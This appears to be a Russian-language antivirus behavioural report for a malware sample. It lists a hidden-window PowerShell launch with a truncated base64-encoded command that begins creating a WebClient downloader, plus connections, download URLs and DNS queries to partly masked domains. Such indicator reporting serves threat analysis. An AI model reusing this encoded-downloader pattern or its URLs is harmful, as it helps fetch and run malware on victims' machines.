Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAOQA2ADUANgBfAF8APQAoACcAdABfADUAMwBfACcAKwAnADIAJwArACcANgAnACkAOwAkAHUANwBfADQAMwA3ADUAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABvADUAMgA5ADAAMQA5AD...
- 'tj####inings.com':80
- 'tj####inings.com':443
- 'di###.center':80
- 'di###center.com':443
- http://tj####inings.com/bhVVXzfNXCxrj3_dV
- http://di###.center/2OTZiNbRxnb2
- 'tj####inings.com':443
- 'di###center.com':443
- DNS ASK su#####iatduchung.com
- DNS ASK tj####inings.com
- DNS ASK so##.lpbes.org
- DNS ASK di###.center
- DNS ASK di###center.com
- DNS ASK ge###tronics.in
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPADEAOQA2ADUANgBfAF8APQAoACcAdABfADUAMwBfACcAKwAnADIAJwArACcANgAnACkAOwAkAHUANwBfADQAMwA3ADUAXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABvADUAMgA5ADAAMQA5AD...' (со скрытым окном)